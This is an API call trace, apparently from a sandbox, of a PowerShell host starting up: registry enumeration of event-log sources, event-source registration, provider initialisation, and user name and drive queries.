	[0612.063] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x344) returned 0x0
	[0612.063] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.063] RegOpenKeyExW (in: hKey=0x368, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x36c) returned 0x0
	[0612.063] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.063] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x370) returned 0x0
	[0612.064] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.064] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x374) returned 0x0
	[0612.064] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.064] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x378) returned 0x0
	[0612.064] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.064] RegOpenKeyExW (in: hKey=0x368, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x37c) returned 0x0
	[0612.064] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.064] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x380) returned 0x0
	[0612.064] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.065] RegOpenKeyExW (in: hKey=0x368, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x384) returned 0x0
	[0612.065] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.065] RegOpenKeyExW (in: hKey=0x368, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x388) returned 0x0
	[0612.065] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x38c) returned 0x0
	[0612.065] RegCloseKey (hKey=0x38c) returned 0x0
	[0612.065] RegCloseKey (hKey=0x368) returned 0x0
	[0612.066] RegCloseKey (hKey=0x388) returned 0x0
	[0612.067] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf58 | out: phkResult=0xccf58*=0x388) returned 0x0
	[0612.067] RegQueryInfoKeyW (in: hKey=0x388, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccecc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccec8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccecc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccec8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.067] CoTaskMemFree (pv=0x0) 
	[0612.067] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.067] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x0, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.067] CoTaskMemFree (pv=0x23c760) 
	[0612.067] CoTaskMemFree (pv=0x0) 
	[0612.067] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.067] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x1, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.067] CoTaskMemFree (pv=0x23c760) 
	[0612.067] CoTaskMemFree (pv=0x0) 
	[0612.067] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.067] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x2, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.068] CoTaskMemFree (pv=0x23c760) 
	[0612.068] CoTaskMemFree (pv=0x0) 
	[0612.068] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.068] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x3, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.068] CoTaskMemFree (pv=0x23c760) 
	[0612.068] CoTaskMemFree (pv=0x0) 
	[0612.068] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.068] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x4, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.068] CoTaskMemFree (pv=0x23c760) 
	[0612.068] CoTaskMemFree (pv=0x0) 
	[0612.068] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.068] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x5, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.068] CoTaskMemFree (pv=0x23c760) 
	[0612.068] CoTaskMemFree (pv=0x0) 
	[0612.068] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.068] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x6, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.069] CoTaskMemFree (pv=0x23c760) 
	[0612.069] CoTaskMemFree (pv=0x0) 
	[0612.069] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.069] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x7, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.069] CoTaskMemFree (pv=0x23c760) 
	[0612.069] CoTaskMemFree (pv=0x0) 
	[0612.069] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.069] RegEnumKeyExW (in: hKey=0x388, dwIndex=0x8, lpName=0x23c760, lpcchName=0xccf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.069] CoTaskMemFree (pv=0x23c760) 
	[0612.069] CoTaskMemFree (pv=0x0) 
	[0612.069] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x368) returned 0x0
	[0612.070] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.070] RegOpenKeyExW (in: hKey=0x388, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x38c) returned 0x0
	[0612.070] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.070] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x390) returned 0x0
	[0612.070] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.070] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x394) returned 0x0
	[0612.070] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.070] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x398) returned 0x0
	[0612.070] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.071] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x39c) returned 0x0
	[0612.071] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.071] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x3a0) returned 0x0
	[0612.071] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.071] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x3a4) returned 0x0
	[0612.071] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x0) returned 0x2
	[0612.071] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x3a8) returned 0x0
	[0612.071] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfb8 | out: phkResult=0xccfb8*=0x3ac) returned 0x0
	[0612.072] RegCloseKey (hKey=0x3ac) returned 0x0
	[0612.072] RegCloseKey (hKey=0x388) returned 0x0
	[0612.072] RegCloseKey (hKey=0x3a8) returned 0x0
	[0612.077] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8c0008
	[0613.216] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f13f68*="WSMan", lpRawData=0x2f13cd8) returned 1
	[0613.218] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0613.218] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.218] CoTaskMemFree (pv=0x2a8450) 
	[0613.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.221] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0613.221] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0613.221] CoTaskMemFree (pv=0x1b3e9f30) 
	[0613.221] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0613.221] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0613.221] CoTaskMemFree (pv=0x23c760) 
	[0613.222] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f194a0*="Alias", lpRawData=0x2f19230) returned 1
	[0613.223] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0613.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.223] CoTaskMemFree (pv=0x2a8450) 
	[0613.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0613.226] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0613.226] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0613.226] CoTaskMemFree (pv=0x1b3e9f30) 
	[0613.226] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0613.226] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0613.226] CoTaskMemFree (pv=0x23c760) 
	[0613.227] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f1ea98*="Environment", lpRawData=0x2f1e828) returned 1
	[0613.228] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0613.228] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.228] CoTaskMemFree (pv=0x2a8450) 
	[0613.229] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0613.230] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0613.230] CoTaskMemFree (pv=0x2a8450) 
	[0613.230] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0613.230] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0613.230] CoTaskMemFree (pv=0x2a8450) 
	[0613.230] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0xccdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d
	[0613.230] SetErrorMode (uMode=0x1) returned 0x1
	[0613.231] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0xcd000 | out: lpFileInformation=0xcd000*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0613.231] SetErrorMode (uMode=0x1) returned 0x1
	[0613.232] GetLogicalDrives () returned 0x4
	[0613.233] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.234] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0613.235] SetErrorMode (uMode=0x1) returned 0x1
	[0613.236] CoTaskMemAlloc (cb=0x68) returned 0x1b3b86f0
	[0613.236] CoTaskMemAlloc (cb=0x68) returned 0x1b3b8680
	[0613.236] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b3b86f0, nVolumeNameSize=0x32, lpVolumeSerialNumber=0xccfd0, lpMaximumComponentLength=0xccfcc, lpFileSystemFlags=0xccfc8, lpFileSystemNameBuffer=0x1b3b8680, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xccfd0*=0x9c354b42, lpMaximumComponentLength=0xccfcc*=0xff, lpFileSystemFlags=0xccfc8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0613.236] CoTaskMemFree (pv=0x1b3b86f0) 
	[0613.236] CoTaskMemFree (pv=0x1b3b8680) 
	[0613.236] SetErrorMode (uMode=0x1) returned 0x1
	[0613.236] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0613.238] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.238] SetErrorMode (uMode=0x1) returned 0x1
	[0613.238] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccf70 | out: lpFileInformation=0xccf70*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0613.238] SetErrorMode (uMode=0x1) returned 0x1
	[0613.238] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.238] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.239] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0613.239] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccaf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.239] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0613.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.240] SetErrorMode (uMode=0x1) returned 0x1
	[0613.240] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccda0 | out: lpFileInformation=0xccda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0613.240] SetErrorMode (uMode=0x1) returned 0x1
	[0613.240] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccb40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.241] SetErrorMode (uMode=0x1) returned 0x1
	[0613.241] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccda0 | out: lpFileInformation=0xccda0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0613.241] SetErrorMode (uMode=0x1) returned 0x1
	[0613.241] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccbe0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0613.241] SetErrorMode (uMode=0x1) returned 0x1
	[0613.241] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcce40 | out: lpFileInformation=0xcce40*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0613.241] SetErrorMode (uMode=0x1) returned 0x1
	[0613.242] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0613.242] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0614.345] CoTaskMemFree (pv=0x1b3e9f30) 
	[0614.345] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0614.345] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0614.346] CoTaskMemFree (pv=0x23c760) 
	[0614.346] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f25b88*="FileSystem", lpRawData=0x2f25918) returned 1
	[0615.207] CoTaskMemAlloc (cb=0x104) returned 0x2a8450
	[0615.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8450, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0615.207] CoTaskMemFree (pv=0x2a8450) 
	[0615.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0615.209] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0615.209] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0615.210] CoTaskMemFree (pv=0x1b3e9f30) 
	[0615.210] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0615.210] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0615.210] CoTaskMemFree (pv=0x23c760) 
	[0615.211] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f2b3c8*="Function", lpRawData=0x2f2b158) returned 1
